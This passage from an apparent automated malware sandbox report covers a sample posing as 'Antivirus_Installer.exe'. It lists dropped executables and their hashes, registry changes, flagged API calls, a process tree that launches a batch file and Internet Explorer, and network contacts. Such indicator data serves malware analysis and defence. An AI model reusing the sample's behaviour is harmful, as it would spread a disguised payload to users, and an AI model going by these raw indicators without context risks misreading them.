| SHA512 | 2a0747087ea14c664688d3453be8f40d396ca916143f0473eb1739fbe5cf1f19a451359d1e8713fe19b3bdda21eaea20a8294b23c0d99dd793818e85b83c28f8 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.wav
| MD5 | 69b31b718e20cc6723c4a816c2aceeb0 |
| SHA1 | 3a3213accba0d99792703b77da74ecd2a2b8510c |
| SHA256 | 9a517e95d9ad086fa73e5ab81bc26e6750e80c42ddb574ed51bedb97a9557c58 |
| SHA512 | 4c918a7d24e20fe60026576aafb625431a36bc4b83dc4c00d30859b0b40ca561046453b0a9c89a92a36dd733ffe3a17214d44653c6c39ef2f5e908ac4227f9ae |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
memory/1124-81-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1980-82-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe
| MD5 | 9cbf1f1e4821fa5b8962423c9b2ecf24 |
| SHA1 | 7f3fd62332d10cfdb0be3452a71cd6df2d7c0602 |
| SHA256 | afcb1f5e73785c0c5952394ca69986e9b9e86cc5fb0a4de4684903a03d9859a4 |
| SHA512 | bee905b459259801185c55e25f8e70fa563ea8ecaa0ad300aea0379500fe683d6bc370ae3d7a0d53898443faf150a1081f23146c8e32deb6961fe955aa0003c8 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe
| MD5 | 8ae9221dcd3eb86c479ad3a272e47c4b |
| SHA1 | fd55b36bdebd91773a2a14636fef6738c5fe9d35 |
| SHA256 | 4e46b8ffffd081aaeae5b5f21e8c1bc5c07eb6a16593c08b030c514cf55e8767 |
| SHA512 | 1d482f7c13269cdd546eaad0b4af7bd6a0d524c0df93365440b823bc6a4eb49e84332c683318fcf200e3375b6536bcdddac0e14bd73fbdeb4874a69c8ea41c02 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.wav
| MD5 | e62fbfae11374ec4a953725d0cee01be |
| SHA1 | 82e6be96bf64ee283ac3c6e8ca60acf4c8a47100 |
| SHA256 | 5dd0971a53b93394df0eba4bf8f4aa845a73c1306fe4fc0c130891fc8380838f |
| SHA512 | 74be448a3ec8746bf157e8e7e964c62914b24a618f339698cb4ad67803470d89563079e628b1f6243f0200a6d051bcfdc089a1ee177be23eca04ce00fa8df8fd |
memory/1784-95-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1776-96-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe
| MD5 | 6dba963d56ae1fcdfd6e840a52416801 |
| SHA1 | 5ad332cce4c7556cc0aa72b9d5792f42e3873b3b |
| SHA256 | eb3940fb1f2a0b16f5e58c7f4b707fb26b6ee08ebe7f5c43b9c02fcf02fe4506 |
| SHA512 | c0ab4d15323aad3f35f82f90e55798a235f8c41fb84308f76566bd758c9a649031c11610af13bea472cf787ed18d53e6e61962ee41ad97854e028bbb47fc4edc |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe
| MD5 | ed695dac2b14ccad335e75f5ddd44139 |
| SHA1 | 35f4fae272c9b8dc84ffdae9b4dbfa4ed32936eb |
| SHA256 | 2d3e7cdbf244704934afa447552c049a891a9ccbd6d4ab42ca2504ad0a99e803 |
| SHA512 | a028c258cc65e208303f458279035d430f8447c6ca950d2de9c345aa7c2a13cff3a36fefdeb9305f8caaffc7da91fff91e05ef8e52b9d3672f7a71b49bbf47d5 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe
| MD5 | 08e74e5f077f0337d0c0d15dde94f8be |
| SHA1 | d5ba49b2ddfe50ea4b214e0f447cbed7fb949279 |
| SHA256 | b41d36f67e147133f8c3aa054b52275f68d7e2735a65eb3abcdcd08bede1100b |
| SHA512 | f102a81b56c053a7c492a0459f9e7410346949074fc68e733ae9174651bb0265266560526782fe1e95cb2769f54fca3071f56839126d9fc8d7266828b9228fa1 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe
| MD5 | 21d90b4350b6c69d01174240997806c3 |
| SHA1 | ca6cdfe5f7f0a15ca177eabf7596d64bc284215c |
| SHA256 | ecadb0f872cf2c112620e0bfdb9f657dd5ac25188c762b2ed7261f9612163757 |
| SHA512 | 1e8089c7c6f1660652b29ab5a5ccac7a51dfa5fa2e28144df5a196b232b4ac489d5eee7e873144365004b76995ce8315d29f7af5ffc90130b61c38a06f1966a7 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe
| MD5 | af4005307577b1e437aa4ca33e00ec4b |
| SHA1 | 05eaefaa7d511a8b0d9c7a0819a4f20b5ea7d206 |
| SHA256 | 159c66ebe8ef08ca2a7502e76344bc0b8c1f9e51d7bed2bad1af164d7aa8a6f4 |
| SHA512 | c27366274ac12e20c11350da2fb9e668b8592e31764c249aaa29df28e1115d215e7604327d2e81c83107e0f70eec7da1443814f3883dc004806e918d62e8dad4 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.wav
| MD5 | 29172c1ae05949d3b9e0f1ad6df73da4 |
| SHA1 | 73dfddb924eb3d0cf3b224e3617b3b249882a6e4 |
| SHA256 | 4d4900dcb852b2fe933abf00eba70f1c1ab3f0d9d479bb7ec781dafcc7c0796e |
| SHA512 | cd51bcd0f9f711ce385934ecf9d483e2ba1e64295f1f1db70361911b0c518e4e197bdbabfc630fb4d18f7bd785058fe009ac326f927d8fb00afe06deeacde95f |
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
139s
Max time network
195s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FB40B121-D8D3-11EE-AEAA-CAFA5A0A62FD} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415573415" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30ded1bee06cda01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c230677000000000200000000001066000000010000200000005f38264e3fd592e5aee7988645a7eb0ac2ab8919b0e069757578a605336d8ea8000000000e80000000020000200000000265ae9c87e1153a7a83c3a2edc65384d9290d2813f043763baf84d027c0037d20000000672ad6b3fd26a5a79e310e4240538184d7b89e71d7b82e1ec8cedadbd9818c77400000009e8fa9f3c0d151d473ed1936040c3b192ff8a1f61294b205b8808e36a333619248a2577ee079554d9417f7bf42b1f0c03c2f7171317e339e037c27bc80658dbe | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c23067700000000020000000000106600000001000020000000fcf14041d9abd6fafd611461c52b762b9add11303e0979a4f46c773588591918000000000e800000000200002000000025958f905ae87bfbaa724eae5dd59d0e45675bb707cd1fa706a5a65266281cb49000000057657760c5ccb25b48b80051a9adcb9b5c4a339ebe2aa70509057371ab4543b946da5b8b49bf657b88b4a59a657afe8bd851a0d714d50d68e84fc3c1e791fb73212e0d538d7af8866affa3c3f0f8b328726e985e48b0e19d4e29a59ca309bd93fd3ef24d3f72d27620512ae64810c165ee3c66601604104701dedfdbc9bc573e8bace90ed9bd8ac34783e5c9e99f86fd400000002d8ea0b8611c442833b5cd26a6e0f422b3d619fd7647bd12d2c259c7a8f69c56ae9be5e9fa4f2ecc48d9c1b44c74a0cd02ddf5d37cdc6b33a8b3be12868eb3d3 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BB.tmp\5BC.tmp\5CD.bat C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=oAkRBqxm8tM
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2536 CREDAT:275457 /prefetch:2
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=lPySS7mt4eo
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2536 CREDAT:472067 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2536 CREDAT:406537 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | custom-gwent.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| FR | 51.75.26.147:80 | custom-gwent.com | tcp |
| FR | 51.75.26.147:80 | custom-gwent.com | tcp |
| US | 8.8.8.8:53 | www.protegent360.com | udp |
| FR | 51.75.26.147:443 | custom-gwent.com | tcp |
| US | 8.8.8.8:53 | www.protegent360.com | udp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 192.185.184.23:443 | www.protegent360.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\5BB.tmp\5BC.tmp\5CD.bat
| MD5 | 6882363dd125a39e084667ddd43532a4 |
| SHA1 | a5b6e74b292d96424d7b39ee9f71e98701f4548d |
| SHA256 | b998f488ff63337265c33a7e298e85679393d54e6094d223cd97e549a17078ba |
| SHA512 | 7bec550ded2c532f279638050638db8abe48f7a31f1175a8caf34dd6ff4ccddfc01331211088ab0b2e3fe980846657f609a897be88eace28c0347f56d7b91a19 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 8b2bac06df2ae5ed18acff64794322cd |
| SHA1 | b8f1af9de328381ed959081094fdfacfff8e6d0e |
| SHA256 | c35aa6b1e580a84f7bf1d2d2e1b279c7d8de07ba188a6bde1354fa8b296e47bd |
| SHA512 | b56bde393583990e59fc1f223febe469493fbbf6c5fe93e6c4214d7cb18767daa3771c55e51d92f6c54879b4f0d58096d63181947339ad08be3a4aa3c42e0d9c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | f991f6355e021b9980401ef4d2678226 |
| SHA1 | 2c0d3da12a3ac0eb06db030730a39d29c9d880de |
| SHA256 | 297786e6c2d2b04f9cb6534c97d493cfb40f9df8250eb6194006bf7027ddbca2 |
| SHA512 | e3ea73aeb0727517d251ce0fb5af0f23e2fdfbdad313d8f7a64b490910a416c6cbec361da90097044904c7667859f04cf1605885ce8e574c9de1c2a7f8dd3449 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | c7c918eee578e9e220d8304f5c0d85c8 |
| SHA1 | 27d49ebe147ebcbc5933eaa9152e7f52a1c6ad3c |
| SHA256 | e410f9a36aa27b75467bb1a0a866b72fa194aa289e16c09f0651173887be2ece |
| SHA512 | d7d1dc4e4c0c9467946d0d4c63ff2d854ab50af3b28f8a95b1a62b21dc86f4a0f37f72b9c23e8043550e16f700c71acbfe71326771c6a10a25f561e257079d16 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | ac89a852c2aaa3d389b2d2dd312ad367 |
| SHA1 | 8f421dd6493c61dbda6b839e2debb7b50a20c930 |
| SHA256 | 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45 |
| SHA512 | c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | 39a084fd37110b032c51f7a0f527a8d5 |
| SHA1 | d2050e84ab3b4db51ce3ece57618809deb79b76a |
| SHA256 | da69936df6d6a24b12b7c04621bec03089ea5381693b2f9e12a1b6061f1c3e33 |
| SHA512 | 19e882087ee1f4d345b242588c4a20e5d2c7a7948364c3ab690a44f33caff4daabc7360d9eb822d931f4484eabfbf7ab5e403b4064e6cf3a3ff00cae78e681d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_B744ED683086DD422B6453395135F670
| MD5 | e3aec7aec963ecdaf260e810f5dbdff4 |
| SHA1 | cc3723b279bac84862e596f3e48caf10b350f88b |
| SHA256 | 7b5bff261ef05bc97e8c73453d70ef1ae5519fa89b4bab05da63df232a76c930 |
| SHA512 | e67a0875f5a25b3529eb4ea10101bc9e9ed4b5121d489ce8154301ccb927a6e2441ddc042b4a9ea92f5954e320825de036afc00c284a223132dcb3857504853a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_B744ED683086DD422B6453395135F670
| MD5 | 924fa0bde929e8bbf7d6ed2fb349e326 |
| SHA1 | fa2e9bfcff55254eb60762f7e5d13f1dbecfdea8 |
| SHA256 | 9a6835fb0854df4519d91f9e5ab7bda686066942b99db66e56523996506f94e4 |
| SHA512 | 7d3c2b8e0c49173c26d8cdcce955315549f2ef9a6aa28ed66ad1d50bbdc9755942e0a64afa9d7dbec0795d842b8fd2920eb57fe90c8cbe85db6c2b9e06364158 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | 1fd85383751b3248e90fd53e1aa25917 |
| SHA1 | 37ce55bab9e89139ed20ea07d1fa55002cdd09dc |
| SHA256 | b22d50de832aefc5a56ca348a0e3fbef6465be808cc70557510a7657e527d8ec |
| SHA512 | 13fb2dd323750ee45b5021ad891be2e9f82b83e8660d7b39aba4b404cac44667634ee1d371412f0d891b6af462b15dfac03203e7f9fcdfe6d4dcf8953e7dba7d |
C:\Users\Admin\AppData\Local\Temp\CabBD3.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ad14708b2cf01ed4327ba6d7d88902ff |
| SHA1 | d13189908466379c7f4833dbd9f0ac8761d9b7e6 |
| SHA256 | 238c5427112ebaf039e0d37d6ee8a1812673c2092e2a93bb90446a41e2c8f200 |
| SHA512 | b9a7c20242ff590f647664b197dff0f121993bf80e80afb4da8666b925ddb8d1b91a9e0c3627b36802a7616ff651dca720ccb79db8323c897cd1060ce1ecdc27 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\23B2QYRT.txt
| MD5 | d228b6ad82956cc409627384172edb69 |
| SHA1 | d07d64e15286a0212aa935b818146d3567d523af |
| SHA256 | dab7f6156787e09953ad2d805f5c992abf6396fe8959ab085869b433330e8a93 |
| SHA512 | e41e8970acd4fd266d9169d9e082f9d95c313935609882d6e034982cf77856557253b82adf5345cc2f442b54be5818c6d969e62f5a7395994f876779d76b6946 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XJ0RD6PK\favicon[1].ico
| MD5 | 868252da58e23d1ab8517ae99209c5c6 |
| SHA1 | f67f560566413a7612d0dde069c94d9cfbbe0b71 |
| SHA256 | 0ea16a4d7b8fe1f677dd2963a564691a68640999768d5cb66a560ae9f15d200d |
| SHA512 | dcd67ee4d1d0596cc0ec3bad609a3d921af995c45b0e833fa836bd0b0c9b0fa16d65dac0f9f65cbcaabd1e426d24d14e92518f255957e0358ae57ad3f21964fc |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\60nmxlj\imagestore.dat
| MD5 | 4d571533d2d455d5ac252f07ad4cc518 |
| SHA1 | f8a4cce5824ae2fa4eb2bfade8cd4045f48a4417 |
| SHA256 | 0e48b1f9e8bd1f1522e3c171ce213b7717b620b6f4ea957179bbb2f190eb17a9 |
| SHA512 | 5d5af42af76e2cb4edf3f53da0857722cafe003562612d8ab3681d0362c09af78e73ccf90612965a1b8193c69ac109c24ae4ef9b78cd9be17b2919c5dd52da74 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HQQVSTWU\favicon[1].ico
| MD5 | f2a495d85735b9a0ac65deb19c129985 |
| SHA1 | f2e22853e5da3e1017d5e1e319eeefe4f622e8c8 |
| SHA256 | 8bb1d0fa43a17436d59dd546f6f74c76dc44735def7522c22d8031166db8911d |
| SHA512 | 6ca6a89de3fa98ca1efcf0b19b8a80420e023f38ed00f4496dc0f821cea23d24fb0992cee58c6d089f093fdefca42b60bb3a0a0b16c97b9862d75b269ae8463b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\60nmxlj\imagestore.dat
| MD5 | e582fb1660ab26d0d29e0d3e9ac1833e |
| SHA1 | 5c6ae97f4b84663607b413750355dd4197a8bfa0 |
| SHA256 | ad7074cee4a19d64a08c68f788909fcf807d7c904c5949c854d306e3c8077e3a |
| SHA512 | 75dc81ad9148a897dda2472f7bb273dafa08e670797b8bbb52982b5bc5eb47378ed39c6362f0acb84e1fcc131e02429bf46fd101e5a157812d3f2a7f01874cbb |
C:\Users\Admin\AppData\Local\Temp\Tar2436.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
